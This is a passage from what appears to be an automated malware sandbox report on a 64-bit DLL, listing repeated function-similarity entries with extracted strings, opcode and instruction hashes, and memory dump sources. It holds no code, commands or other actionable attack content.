                                                                                                        • Opcode Fuzzy Hash: 450a975b33d67058faa5ef23269fdb7d474cb1b00904f6db6eeb6156179070ce
                                                                                                        • Instruction Fuzzy Hash: CCD1F27550670DCBEBA9CF28C58A6DE3BE5FF48304F104129FC1A862A1D7B4EA25CB45
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: k |P
                                                                                                        • API String ID: 0-500141808
                                                                                                        • Opcode ID: 1aac0f1d3442458b59664808ae9574f9abf7ab878da11c77e58f892187b88b3f
                                                                                                        • Instruction ID: bdb77ffc642b3299673720cbbe7adc6e022f36649dc5c9d605d8e1814f76fd65
                                                                                                        • Opcode Fuzzy Hash: 1aac0f1d3442458b59664808ae9574f9abf7ab878da11c77e58f892187b88b3f
                                                                                                        • Instruction Fuzzy Hash: 28913B30E0061DDBEF69CFA9E8896DDB7B1FB44344F40822DE416A72A1DB74994ACF41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: {?
                                                                                                        • API String ID: 0-3906500937
                                                                                                        • Opcode ID: 2d540e23551ce5f958f4764bec98e9519d494356363efa56796c0522d6c48830
                                                                                                        • Instruction ID: 7643702d073ff4940ecce4f9a509df35797120a70f9b1d87fbff4b68fa84022d
                                                                                                        • Opcode Fuzzy Hash: 2d540e23551ce5f958f4764bec98e9519d494356363efa56796c0522d6c48830
                                                                                                        • Instruction Fuzzy Hash: 90B157B590070DCFEB98CF68C18A9DD3BA9FB15358F404129FC0E96290D7B9E919CB52
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Rg
                                                                                                        • API String ID: 0-444783058
                                                                                                        • Opcode ID: 062f6907516fb83770376f4ae06b90337ece7bd6ef9ef592e7bb1771c5ef6bb2
                                                                                                        • Instruction ID: de0b65e82f7df1f72d442b51ab019ddee83380224b4c4f084cb2c80ee98f37ca
                                                                                                        • Opcode Fuzzy Hash: 062f6907516fb83770376f4ae06b90337ece7bd6ef9ef592e7bb1771c5ef6bb2
                                                                                                        • Instruction Fuzzy Hash: 9A91087150424D8BEF48CF68C88A6DE3FF0FB18398F255219E84AA6290D778D654CBD9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RC/
                                                                                                        • API String ID: 0-1672839029
                                                                                                        • Opcode ID: cd45515637f1f2b16c20ca83177dd82b64ca54d483ea71e032997c7aebad3db9
                                                                                                        • Instruction ID: 3bbf9db0e9f1f1cd2f3806796f1fd845787a3905c9f06ecb1b9c11751c7e15f2
                                                                                                        • Opcode Fuzzy Hash: cd45515637f1f2b16c20ca83177dd82b64ca54d483ea71e032997c7aebad3db9
                                                                                                        • Instruction Fuzzy Hash: 7291FA7150468DABDBBACF28DC9A7D937A0FB48344F90811AD90E8F290DF745B49DB41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: XU
                                                                                                        • API String ID: 0-683303128
                                                                                                        • Opcode ID: e071b3a0d50c9461b57229d15226e783a6e60c7e98d42caa5a907250e51fd640
                                                                                                        • Instruction ID: 425e58cadb221d331942f6c121d336e4e4e9b3bb556196463e5803c943499b9b
                                                                                                        • Opcode Fuzzy Hash: e071b3a0d50c9461b57229d15226e783a6e60c7e98d42caa5a907250e51fd640
                                                                                                        • Instruction Fuzzy Hash: 10613B70D14608DBEB9CDFA4E8896DDBBB1FB48344F10812DE816E72A1DB749A49CF41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: F'K
                                                                                                        • API String ID: 0-2963079709
                                                                                                        • Opcode ID: 713e8163358f3e4ccf3a322240c7036fe92718bea1a19a215dd26039f06aebda
                                                                                                        • Instruction ID: 3cdbfef3d71ad5117e50a41d4a808b16c297a78b625f2c46d5022480677e20ff
                                                                                                        • Opcode Fuzzy Hash: 713e8163358f3e4ccf3a322240c7036fe92718bea1a19a215dd26039f06aebda
                                                                                                        • Instruction Fuzzy Hash: C481A5749043888BDBB9DF68C8897DDBBB0FB48348F20411EDC5AAB291DBB45685CF41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Gh
                                                                                                        • API String ID: 0-277699601
                                                                                                        • Opcode ID: 7940fb094068dd5baf5e4535b0b949c1577390b24490b32456d4c9773adc2951
                                                                                                        • Instruction ID: 49f89991b7669aef05847bf6ac8085ae3f2e5bccc0c70176600d3bb48f89c730
                                                                                                        • Opcode Fuzzy Hash: 7940fb094068dd5baf5e4535b0b949c1577390b24490b32456d4c9773adc2951
                                                                                                        • Instruction Fuzzy Hash: A2512670614B48ABDBC9DE28C4C669D3FE1FB483A8FA06028FC4786295D774D4C5CB81
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: KdW
                                                                                                        • API String ID: 0-1553299040
                                                                                                        • Opcode ID: 3dbde57a559d0e97d3426f0fe397d2413bb4c768266781bd1ea48c4852796dec
                                                                                                        • Instruction ID: 07466cbb68b99a3b5ba183136cc33729b20d4f14bf8bba25a53fc7287070b877
                                                                                                        • Opcode Fuzzy Hash: 3dbde57a559d0e97d3426f0fe397d2413bb4c768266781bd1ea48c4852796dec
                                                                                                        • Instruction Fuzzy Hash: 17619EB090074A8BDF48CF28C49A59E7FB1FB68398F60421DFC5696290D374DAA5CBC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 5
                                                                                                        • API String ID: 0-2458008916
                                                                                                        • Opcode ID: 3e00d75dc5af6ed95834cd7e36aa8dd6f7dfadaf5872006e22b3d5cd376261b0
                                                                                                        • Instruction ID: a26923ab85f7e808caed84009aa606e64988cd015e626ed89f9c8f152d3751bb
                                                                                                        • Opcode Fuzzy Hash: 3e00d75dc5af6ed95834cd7e36aa8dd6f7dfadaf5872006e22b3d5cd376261b0
                                                                                                        • Instruction Fuzzy Hash: FD51BEB090074E8BDB48CF64C88B5DE7FB0FB68398F20421DEC5696294D3B496A5CBC4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: >
                                                                                                        • API String ID: 0-260571596
                                                                                                        • Opcode ID: 52da228a42332ba98b714843feb8a4ffa7a865caa0d47f3da51bcc1adbe3605a
                                                                                                        • Instruction ID: 46fc6c4e0ac0a664899e95d82bf5bf8fb1e46c637e697bbd607199efc3ac47d3
                                                                                                        • Opcode Fuzzy Hash: 52da228a42332ba98b714843feb8a4ffa7a865caa0d47f3da51bcc1adbe3605a
                                                                                                        • Instruction Fuzzy Hash: E351187090070E8FDF48DF68C48A5DE7FB0FB58398F255219E80AA6260C7789695CFC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: e#y
                                                                                                        • API String ID: 0-1553523250
                                                                                                        • Opcode ID: 7cfc1742122b5da270b1305c98699770b0d8300b0d29b437b0f5bbbb71ff1cdb
                                                                                                        • Instruction ID: 8922a9c917ecf92f84784f2c0912e7afb41abd4682f2986cf207ea24a7e27a88
                                                                                                        • Opcode Fuzzy Hash: 7cfc1742122b5da270b1305c98699770b0d8300b0d29b437b0f5bbbb71ff1cdb
                                                                                                        • Instruction Fuzzy Hash: 4451C0B090034A8BDB48DF24C49A4DE7FB1BB68394F60461DEC56AA290D37896A5CBC4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ;Qe+
                                                                                                        • API String ID: 0-3743842969
                                                                                                        • Opcode ID: abc73cde212dc252b0e5d03e266be842b85d1299fa2b3d615a0caa319cbc98b6
                                                                                                        • Instruction ID: 2891cc472bdff435687e8dc78c7f584053815dc88c3a0ad3e69441950bb252b7
                                                                                                        • Opcode Fuzzy Hash: abc73cde212dc252b0e5d03e266be842b85d1299fa2b3d615a0caa319cbc98b6
                                                                                                        • Instruction Fuzzy Hash: FB51B3B190074A8BDB48CF68C49A5DE7FB0BB68398F114229EC5696250D374DAA5CBC0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ,'
                                                                                                        • API String ID: 0-3722628154
                                                                                                        • Opcode ID: fb5c24a2de7b785ef7d1522db3a7cd1fc0c6d32909dcdfd4e7ef4007326c169e
                                                                                                        • Instruction ID: 8bcc0ae8ca8a44d8cc4a64df71be4da37ed53fd059e3607e1506b6ed9a83d4bd
                                                                                                        • Opcode Fuzzy Hash: fb5c24a2de7b785ef7d1522db3a7cd1fc0c6d32909dcdfd4e7ef4007326c169e
                                                                                                        • Instruction Fuzzy Hash: 9C51E3B091074A8FDB48CF68C9865DE7FB0FB68394F10421DEC5AA6290D37496A5CFC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ;qct
                                                                                                        • API String ID: 0-1256533914
                                                                                                        • Opcode ID: 7e5896647748426d00c93f1e327efcd977346de81977c4c15da4b7b9c787c365
                                                                                                        • Instruction ID: 5c1d59b2199d0d85db2571b197c7ca3ede17e59358e5629c23b069c973ffe58b
                                                                                                        • Opcode Fuzzy Hash: 7e5896647748426d00c93f1e327efcd977346de81977c4c15da4b7b9c787c365
                                                                                                        • Instruction Fuzzy Hash: B741E27051078D8BDB49CF68C88A4DE7BA0FB4835CF155619FC8AA6260D3B8D585CF89
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: %[
                                                                                                        • API String ID: 0-3862537531
                                                                                                        • Opcode ID: f1dc08e8e3e3301475fb70ff4cfa84bb86d735aa649ff25d3a10773117e6cde7
                                                                                                        • Instruction ID: 6a4ad4b0db03769040014b30bff45f2a66b5b8118bf8a9f7d20fa3eb207c29ac
                                                                                                        • Opcode Fuzzy Hash: f1dc08e8e3e3301475fb70ff4cfa84bb86d735aa649ff25d3a10773117e6cde7
                                                                                                        • Instruction Fuzzy Hash: 6E31D6B150478A8BDB4CDF68D8565AE3BB1FB48304F004A2DFD26DB390D7B49624CB94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Wn
                                                                                                        • API String ID: 0-506041651
                                                                                                        • Opcode ID: 571cac09fbe3685261a59c499fbd8c80fdf8cf6d47964e918e1805a2c447958a
                                                                                                        • Instruction ID: 81acd842a4d7b99bb8f16045e05b91d2bb3390d65dcb5750e05b0634c9df5c42
                                                                                                        • Opcode Fuzzy Hash: 571cac09fbe3685261a59c499fbd8c80fdf8cf6d47964e918e1805a2c447958a
                                                                                                        • Instruction Fuzzy Hash: 5F41D4B050078A8FDF48CF68D89A5DE7BB1FB48348F104A2CEC6696290D3B4D664CBC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: "p
                                                                                                        • API String ID: 0-3060671971
                                                                                                        • Opcode ID: ae29b2ab0911a73132ecede333d1ad00ec6016c3b77c06c2e3197b8238caa4ac
                                                                                                        • Instruction ID: 6d64e93883db61d95f36b7a5a375b7ada03e85890cb65b9286afd9a0e7997e4a
                                                                                                        • Opcode Fuzzy Hash: ae29b2ab0911a73132ecede333d1ad00ec6016c3b77c06c2e3197b8238caa4ac
                                                                                                        • Instruction Fuzzy Hash: 42317EB190438E8FDB48DF68D85A5AE3BA0FB48344F014A1DEC269B354D7B4D664CBD4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 3k^)
                                                                                                        • API String ID: 0-3788653604
                                                                                                        • Opcode ID: bb4a256fcbfa579ec56a1ee2ed7beb19ee26f98eb9724182ed08b84c2a93462e
                                                                                                        • Instruction ID: 9f8dcddef577f6809e8fc1cb2f7e992fa0b5e1cd21e70ff7818dd4bfba9124f9
                                                                                                        • Opcode Fuzzy Hash: bb4a256fcbfa579ec56a1ee2ed7beb19ee26f98eb9724182ed08b84c2a93462e
                                                                                                        • Instruction Fuzzy Hash: B7417FB090474E8BDB44CF64C48A5CE7FB0FB68398F200619F859A6250D3B8D6A5CBD5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: L>
                                                                                                        • API String ID: 0-3698593629
                                                                                                        • Opcode ID: 4505467bed29688f524a608710bc2007b6739dbdf074f8a934cd9a0936b0c64f
                                                                                                        • Instruction ID: d89d460aa873d83448a17f0a74045e6cf2e1d6238d53f49acea812bb04bd12ae
                                                                                                        • Opcode Fuzzy Hash: 4505467bed29688f524a608710bc2007b6739dbdf074f8a934cd9a0936b0c64f
                                                                                                        • Instruction Fuzzy Hash: C23193716183818BD748DF28D45652ABBE1FB8D30CF504B2DF8CAA7255D738D605CB4A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4s
                                                                                                        • API String ID: 0-872399246
                                                                                                        • Opcode ID: 6d87eca2fd37755a10645a04d53ddd8ccaa51cb07cf26575bdb0066d7b11df8f
                                                                                                        • Instruction ID: eeb76c7ae662c84e9fd1594776157fcd1e0c77f05a4f9c485f3ea2b2cc7d31c8
                                                                                                        • Opcode Fuzzy Hash: 6d87eca2fd37755a10645a04d53ddd8ccaa51cb07cf26575bdb0066d7b11df8f
                                                                                                        • Instruction Fuzzy Hash: 314181B090474A8FDB48CF64D48A5DF7FB0FB68398F200519E859A62A0D378D6A4CFC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: &'
                                                                                                        • API String ID: 0-655172784
                                                                                                        • Opcode ID: 350a21f38a3fdb5f3133185a05ab1b6e8489f4d150297426f8e9146ad85da26a
                                                                                                        • Instruction ID: e60b1eca4cd057e5464165fc71d6e00ca11e6494182570a2c7a3ee484fb5e5db
                                                                                                        • Opcode Fuzzy Hash: 350a21f38a3fdb5f3133185a05ab1b6e8489f4d150297426f8e9146ad85da26a
                                                                                                        • Instruction Fuzzy Hash: DE3179755083818BD348DF28C55641ABBE1BBCC35CF805B2DE4CAAB3A4D778D605CB4A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: `
                                                                                                        • API String ID: 0-1850852036
                                                                                                        • Opcode ID: 1919c1110502d15319449504d6e91b7fa88324414ab81abcf7b1c29e64ecc28d
                                                                                                        • Instruction ID: 12f27fef96dc8894754dd231533b976fb372cf9f09be1d3cddb09b50d4677c93
                                                                                                        • Opcode Fuzzy Hash: 1919c1110502d15319449504d6e91b7fa88324414ab81abcf7b1c29e64ecc28d
                                                                                                        • Instruction Fuzzy Hash: 2221267065DB449FE388DF29C48961BBAE1FBD8340F905A1EF885C2360C734D845CB42
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: BsL
                                                                                                        • API String ID: 0-590970710
                                                                                                        • Opcode ID: 4c7ca18370d47a9c2cceab002f43e00c4595808ca112b21f17e8f3d7773031d4
                                                                                                        • Instruction ID: bf3e705d0a3e127a6b239d821588e89859f67f6db20862a07d3c8d6d25b0e04a
                                                                                                        • Opcode Fuzzy Hash: 4c7ca18370d47a9c2cceab002f43e00c4595808ca112b21f17e8f3d7773031d4
                                                                                                        • Instruction Fuzzy Hash: 41317DB1529780AFD3C8DF28C48691BBBE0FB89314F816A2DF9C586260D374D455CF02
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ZR
                                                                                                        • API String ID: 0-4130514108
                                                                                                        • Opcode ID: 6cbb8a842fd3cc15b819203d482a3a3b46369313eab12406f6265ee7f7ea0382
                                                                                                        • Instruction ID: b13af9977396cc860318babd94d7947ade869d3bdb5f1587fd609083ec60b6d4
                                                                                                        • Opcode Fuzzy Hash: 6cbb8a842fd3cc15b819203d482a3a3b46369313eab12406f6265ee7f7ea0382
                                                                                                        • Instruction Fuzzy Hash: 0B316EB052D780AFD388DF28C49691ABBE1FBC5315F806A1DF9968B350D774D445CB42
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: %F
                                                                                                        • API String ID: 0-915744445
                                                                                                        • Opcode ID: cf4e8b82da0d821891615694ed2d7715b09984878493b04af082e458cdddcb63
                                                                                                        • Instruction ID: f3632c01bd7492b9d648e83c8b8289f5be8476ad9f7b0aa526bfe9f17a615d29
                                                                                                        • Opcode Fuzzy Hash: cf4e8b82da0d821891615694ed2d7715b09984878493b04af082e458cdddcb63
                                                                                                        • Instruction Fuzzy Hash: A1317AB15087809BD348DF28D44A45ABBE1BB9C31CF414B1DF4CAAB254D3B9D608CF0A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: >
                                                                                                        • API String ID: 0-1166260821
                                                                                                        • Opcode ID: 7fdb2c55224cd27c72bb618ee64ca03bed07baaed02b8a8707ebf8ca8fbe557d
                                                                                                        • Instruction ID: a3d582c264d7a48cbd0e974e941d71c0af5034fa157bb054186120ff964f1b5c
                                                                                                        • Opcode Fuzzy Hash: 7fdb2c55224cd27c72bb618ee64ca03bed07baaed02b8a8707ebf8ca8fbe557d
                                                                                                        • Instruction Fuzzy Hash: 4F316BB55083808FD788DF28D45941ABBE0BB9C358F404B2DF4CAA72A1D778DA45CF0A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: -
                                                                                                        • API String ID: 0-524432557
                                                                                                        • Opcode ID: ab6574b7591fa644ef4a174e0089e3a7f2dde0b4bdacdeb17973816cbe5b2230
                                                                                                        • Instruction ID: 2743ae798d84361f3c47c0844efe4056bc1e573d44da25ce9fa5af028cbcbbd6
                                                                                                        • Opcode Fuzzy Hash: ab6574b7591fa644ef4a174e0089e3a7f2dde0b4bdacdeb17973816cbe5b2230
                                                                                                        • Instruction Fuzzy Hash: E22160B152D780AFD388DF29D18991BBBE0BB85344F806E1DF8C68B250D7B5D845CB46
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 9D
                                                                                                        • API String ID: 0-1055660748
                                                                                                        • Opcode ID: 7e3a213964b2efcfd3778a88dd8b399f98e251b5205d52f3c39e35f889fd4133
                                                                                                        • Instruction ID: 2b980fabc4745c60efad4018d3cdf33bc582eba9e1b676cceb4e0857b73aa84d
                                                                                                        • Opcode Fuzzy Hash: 7e3a213964b2efcfd3778a88dd8b399f98e251b5205d52f3c39e35f889fd4133
                                                                                                        • Instruction Fuzzy Hash: 6C2179B450C3858BD348DF28D14A51ABBE0BB9C70CF400B5DF8CAAB254D778D644CB0A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
